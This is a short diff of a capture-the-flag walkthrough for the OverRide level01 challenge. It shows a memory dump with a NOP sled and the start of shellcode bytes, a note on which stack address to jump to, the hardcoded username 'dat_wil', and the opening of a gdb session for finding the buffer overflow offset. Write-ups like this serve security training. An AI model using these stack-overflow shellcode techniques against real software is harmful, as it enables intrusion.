ArthurMatthys/OverRide/level01/walkthrough.md

 0xffffd7f2:	0x90909090	0x90909090	0x90909090	0xdb31c031
 ```

-It is stored since the address `0xffffd7d0` but to be sure we will put `0xffffd7e2` in the stack.
+It's storage begins at the address `0xffffd7d0` but to be sure, we will put `0xffffd7e2`'s stack address.

-We then need to defined when the buffer start to overflow: (we know by looking inside the decompiled code that the username is `dat_wil`)
+We then need to define when the buffer starts to overflow: (we know by looking inside the decompiled code that the username is `dat_wil`)
 >level01@OverRide:~$ gdb -q ./level01
 >Reading symbols from /home/users/level01/level01...(no debugging symbols found)...done.
 >(gdb) r